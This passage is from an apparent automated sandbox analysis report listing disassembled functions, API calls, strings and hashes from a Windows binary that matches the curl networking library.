                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errno$strtoll
                                    • String ID: 0kv@qv@/lv
                                    • API String ID: 146016610-1424214619
                                    • Opcode ID: 02545ce53a5916b7971596a36b90024364d272872b2902d01904920987309dc6
                                    • Instruction ID: 632b677cdef29e39fb319643cd4205a71768d24694ed9f865b703e214ffb8054
                                    • Opcode Fuzzy Hash: 02545ce53a5916b7971596a36b90024364d272872b2902d01904920987309dc6
                                    • Instruction Fuzzy Hash: EA11B275900305AFCB258F6894905E9BFF5EF59305B109466E899EB311D6B28DC8CB50
                                    Function 00E12677 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentVariableA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00000000,00000001,?,?,?,00E28727,?,?,00000000,?,?,?,00E28849,00000000,?), ref: 00E12698
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E27EE5,?,?,?,00E28727,?,?,00000000,?,?,?,00E28849,00000000,?,?), ref: 00E126C4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E28849,00000000,?,?,?,00E12373,?,?,?,?,00E016C6,?,00200030), ref: 00E126DF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: EnvironmentVariablefreerealloc
                                    • String ID: CURL_SSL_BACKEND
                                    • API String ID: 3604909764-3552431867
                                    • Opcode ID: 0559ee5203a0d7257e66b55f564cf942488502e14edbd43d46a912b275fa4ee0
                                    • Instruction ID: 0204162cdbc76dfe7d6da26ded7f6740d1cfa8c400277e5fe6db10b143148f00
                                    • Opcode Fuzzy Hash: 0559ee5203a0d7257e66b55f564cf942488502e14edbd43d46a912b275fa4ee0
                                    • Instruction Fuzzy Hash: 5201FC37A05629BF4F259B5AAC048DF7EEDDFC5765311006FE901F3290D9B14C904A94
                                    Function 00E0D57E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0D58E
                                    • strtod.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?), ref: 00E0D59C
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0D5A7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errno$strtod
                                    • String ID: 0kv@qv@/lv
                                    • API String ID: 3632641845-1424214619
                                    • Opcode ID: 75e77ff7ede01b2a91f8fb7daa9afce122dde10d68b5faa2082fcd563366b44f
                                    • Instruction ID: 83f212c9e63fd644062528536c436b6b41433e0dee85492caedd175b706c7a2d
                                    • Opcode Fuzzy Hash: 75e77ff7ede01b2a91f8fb7daa9afce122dde10d68b5faa2082fcd563366b44f
                                    • Instruction Fuzzy Hash: EF01D232908A09DFD7169EB8DC116BDB778EF4679DF205296D802BE0D1EB7089C5C3A0
                                    Function 00E0D4FE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0D511
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?), ref: 00E0D522
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0D52D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errno$strtol
                                    • String ID: 0kv@qv@/lv
                                    • API String ID: 3596500743-1424214619
                                    • Opcode ID: 5b23822ca6bb4b847b6788c3874cda32ccb83166e51a3b6d5e6da5da6491a931
                                    • Instruction ID: 4e1004c565a903a6af6b5488c95964013bb0f09eb8d7445f6a69af08f0c9b1f0
                                    • Opcode Fuzzy Hash: 5b23822ca6bb4b847b6788c3874cda32ccb83166e51a3b6d5e6da5da6491a931
                                    • Instruction Fuzzy Hash: 8601F237508609EFDB168F98DC147A877B8EF4235EF2044A6D801AB095D3B18E84CB60
                                    Function 00E4ADF2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,HTTP,?,?), ref: 00E4AE0A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4AE21
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E4AE3D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$_strdup
                                    • String ID: %s/%s
                                    • API String ID: 2653869212-2758257063
                                    • Opcode ID: 052d450e77fbb517dcd5f677005b4a398c386aa786ba9e0e03ed6da21c9d56d1
                                    • Instruction ID: 33fd95b67a0f5cadab6f3dd2ef674733e3e0a7ef7ca0410b45ecf074267455ae
                                    • Opcode Fuzzy Hash: 052d450e77fbb517dcd5f677005b4a398c386aa786ba9e0e03ed6da21c9d56d1
                                    • Instruction Fuzzy Hash: 7EF02733A445309F46152367BC0846F6BA8CF85BB2319043EFC04F3220DE940C4987E1
                                    Function 00E3E886 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • send.WS2_32(?,000000FF,00000003,00000000), ref: 00E3E8AE
                                    • WSAGetLastError.WS2_32(?,?,?,00E3E787,00000000), ref: 00E3E8B8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLastsend
                                    • String ID: SENT$Sending data failed (%d)
                                    • API String ID: 1802528911-3459338696
                                    • Opcode ID: 386f1d666bb8ca346ffb2d89e8742e411971cd900067654e6270512061fe6754
                                    • Instruction ID: 8aab88d6cfbaa2d451c13c11dded84933cdea242769497b85e0fd5101c116c47
                                    • Opcode Fuzzy Hash: 386f1d666bb8ca346ffb2d89e8742e411971cd900067654e6270512061fe6754
                                    • Instruction Fuzzy Hash: 89F0F031604304BFD7096B99EC1AEAF7FACDB467A0F1480A8F445A73C2E5615E00C7A0
                                    Function 00E01F10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMON
                                    Download Yara Rule
                                    APIs
                                    • _read.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?), ref: 00E01F24
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E01F32
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E01F3D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errno$_read
                                    • String ID: 0kv@qv@/lv
                                    • API String ID: 530745434-1424214619
                                    • Opcode ID: 041010c7025cd0db4031511af491cacf75c9c26b20129dc18ce12791fe917e0d
                                    • Instruction ID: 083d62ddf9b28c1214a7875a6b637afedc311ee93f0bf995767c970c2bcb8009
                                    • Opcode Fuzzy Hash: 041010c7025cd0db4031511af491cacf75c9c26b20129dc18ce12791fe917e0d
                                    • Instruction Fuzzy Hash: F7F0BE32308305DFDB098F58E804BAA3BE8AF05341F4408A8F949EB261C7B2EC408B65
                                    Function 00E4014E Relevance: 6.3, APIs: 5, Instructions: 93COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000017,00000017,?,00E2EB2F,?,?,?,?,?), ref: 00E4016B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00E1E01D,00000000,00000000,?), ref: 00E401A4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E1E01D), ref: 00E401CA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E1E01D), ref: 00E40222
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00E1E01D,00000000,00000000,?), ref: 00E40234
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$malloc
                                    • String ID:
                                    • API String ID: 2190258309-0
                                    • Opcode ID: a5595582b714f09e216d69cef8b52ab28d6360a22f06569dbf85f43711cabf30
                                    • Instruction ID: e71a403dc5346af5b81cb914ce439e215aaa35608b2f7e2e953b5c693d0be550
                                    • Opcode Fuzzy Hash: a5595582b714f09e216d69cef8b52ab28d6360a22f06569dbf85f43711cabf30
                                    • Instruction Fuzzy Hash: AA31F536614214DFCB089F29FC4455E7BE5EF44361B14847AE905FB365DAB49D04CB90
                                    Function 00E21150 Relevance: 6.3, APIs: 5, Instructions: 92COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E211DA
                                      • Part of subcall function 00E10D8D: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E10DA4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E211F3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21208
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21231
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21246
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$malloc
                                    • String ID:
                                    • API String ID: 2190258309-0
                                    • Opcode ID: 9196d6b5fee19b92406b5d152b76cb82b7e35260e544fa4b90f473d1f52c37f0
                                    • Instruction ID: be87f841af3c6fc1544bed842349827ecff6ff0887f971ab87c40ef5a3d3c693
                                    • Opcode Fuzzy Hash: 9196d6b5fee19b92406b5d152b76cb82b7e35260e544fa4b90f473d1f52c37f0
                                    • Instruction Fuzzy Hash: B031AF32700635CFCF249F19FC5462973E5AF94365B1850BAE905F7261CBB4AD098A91
                                    Function 00E4AB9A Relevance: 6.3, APIs: 5, Instructions: 64COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4ABCC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4ABFD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4AC1F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4AC36
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4AC50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 1bf9ed882e1620fb819a2033fc28954a295bfff182fc522069b35a7510289b73
                                    • Instruction ID: 77da7df97143fb6bdbf51d64c29652f9551fe1adbf5565bc9fbaf7cfa0246e74
                                    • Opcode Fuzzy Hash: 1bf9ed882e1620fb819a2033fc28954a295bfff182fc522069b35a7510289b73
                                    • Instruction Fuzzy Hash: 22210076614A26EFCB085F56FD54459FBA1FF48361314952AD409A3B71CBB4AC24CFC0
                                    Function 00E3DCE3 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 183COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3DD98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: %s%s$Wildcard - "%s" skipped by user$Wildcard - START of "%s"
                                    • API String ID: 1294909896-4272885751
                                    • Opcode ID: 74f37f6abe49a08e76d577623979329ce2caa25386ffd31b268e9c5bfad10a71
                                    • Instruction ID: d9003780a55ec13605fc8b6c70a6014d966d1d92e43bca9850c92b8188619eb5
                                    • Opcode Fuzzy Hash: 74f37f6abe49a08e76d577623979329ce2caa25386ffd31b268e9c5bfad10a71
                                    • Instruction Fuzzy Hash: 5D619F71B08602EFCB289F64EC946A9FBF1FF94304F14616AD919AB350CB317854DB90
                                    Function 00E373CA Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 174COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3741B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3759B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E375B6
                                    Strings
                                    • Failed to alloc scratch buffer, xrefs: 00E37427
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$malloc
                                    • String ID: Failed to alloc scratch buffer
                                    • API String ID: 2190258309-2192203314
                                    • Opcode ID: 5435f4b284f1bd2caa3cb41816612581e0408141a591c4ffed5971070aa70a5f
                                    • Instruction ID: 22fc7cdd5a280946524672b0196f139a6121622cbe3159f19f1c3cb705bd1ca7
                                    • Opcode Fuzzy Hash: 5435f4b284f1bd2caa3cb41816612581e0408141a591c4ffed5971070aa70a5f
                                    • Instruction Fuzzy Hash: 95615F75E04209AFCB18CFA8D988AAEBFF5BF48314F1481AAD455F7351D770AA05CB90
                                    Function 00E36E00 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 138COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E36E3D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E36F1D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: .
                                    • API String ID: 1294909896-916926321
                                    • Opcode ID: 039696d8557e3616ee46dff63f3404e0c4f17237c98a217f9b5ad6f6b9fd0ba1
                                    • Instruction ID: 10cbce2cc84605db58388a580551eac717c6b5d84370868654b8c444f2ac6a57
                                    • Opcode Fuzzy Hash: 039696d8557e3616ee46dff63f3404e0c4f17237c98a217f9b5ad6f6b9fd0ba1
                                    • Instruction Fuzzy Hash: 9851AF71708311EFCB14CF25E84875AFFE4FF48754F14956AE848AB251D7B0A908CB91
                                    Function 00E3FEA6 Relevance: 6.1, APIs: 4, Instructions: 128networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • getaddrinfo.WS2_32(?,?,?,?), ref: 00E3FEC0
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00E3FF44
                                    • freeaddrinfo.WS2_32(00000000,?,?), ref: 00E3FFCE
                                    • WSASetLastError.WS2_32(00002AF9,?,?), ref: 00E3FFF2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLastfreeaddrinfogetaddrinfomalloc
                                    • String ID:
                                    • API String ID: 2354400463-0
                                    • Opcode ID: 75daddfddfaf4d2903dd5a81a888dffef62fbdc34b470dd78714ac72d7db264d
                                    • Instruction ID: df0916ea658d0554ca4092f41e2dc1ce360ea4502b6554c7b09616c124c29923
                                    • Opcode Fuzzy Hash: 75daddfddfaf4d2903dd5a81a888dffef62fbdc34b470dd78714ac72d7db264d
                                    • Instruction Fuzzy Hash: 1641AB72E00B06EFCB24CF69D448AAABBB5BF45319F10453EE806A7651D770EA44CBD0
                                    Function 00E2C6A7 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 104COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C7FA
                                    Strings
                                    • Connection died, tried %d times before giving up, xrefs: 00E2C759
                                    • Connection died, retrying a fresh connect (retry count: %d), xrefs: 00E2C777
                                    • REFUSED_STREAM, retrying a fresh connect, xrefs: 00E2C72F
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: Connection died, retrying a fresh connect (retry count: %d)$Connection died, tried %d times before giving up$REFUSED_STREAM, retrying a fresh connect
                                    • API String ID: 1294909896-4242497519
                                    • Opcode ID: b1626fc810cd88a5179048e5bc23b5ee5ebab318180842bc33aa9119ee7df76f
                                    • Instruction ID: 0eb53efa6614c0bc0760d54d9f0160733a02548bf07fe69ac8932aa02d49b6b1
                                    • Opcode Fuzzy Hash: b1626fc810cd88a5179048e5bc23b5ee5ebab318180842bc33aa9119ee7df76f
                                    • Instruction Fuzzy Hash: D4410831748651AFEB1DCB34F848BA9B7A0AF45358F2C5169E80D6B292D7B07844CBA1
                                    Function 00E41B30 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E03857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 00E03872
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E41B96
                                    Strings
                                    • Mailbox UIDVALIDITY has changed, xrefs: 00E41BDE
                                    • OK [UIDVALIDITY %19[0123456789]], xrefs: 00E41B68
                                    • Select failed, xrefs: 00E41C32
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __stdio_common_vsscanffree
                                    • String ID: Mailbox UIDVALIDITY has changed$OK [UIDVALIDITY %19[0123456789]]$Select failed
                                    • API String ID: 2458389622-3309259123
                                    • Opcode ID: b218d539fde018a4e0e597d5a9057637fb2b96e9bdb30e11205a1362b613d1ff
                                    • Instruction ID: a92a0f00fd1ed235ef4d8fe215c18d36444af2704a688ad1321750265e0d2e22
                                    • Opcode Fuzzy Hash: b218d539fde018a4e0e597d5a9057637fb2b96e9bdb30e11205a1362b613d1ff
                                    • Instruction Fuzzy Hash: 4D31E971B44205CFCF08AF56FD829AEB7E9FF84710B1450BAE805B7252DA74AC818B50
                                    Function 00E0903B Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,Failed to create/open output), ref: 00E0909C
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 00E090D7
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00E57668,?), ref: 00E090E8
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 00E09107
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fputs$fwrite
                                    • String ID:
                                    • API String ID: 2206100360-0
                                    • Opcode ID: 5922792f881bfec1c6f9a1353977375b3e6831e13e832194e90c83e8501b092e
                                    • Instruction ID: 18c05795a95069c2d03be09f4197bf3f44d84ca813c7dbf09f2c350557033dca
                                    • Opcode Fuzzy Hash: 5922792f881bfec1c6f9a1353977375b3e6831e13e832194e90c83e8501b092e
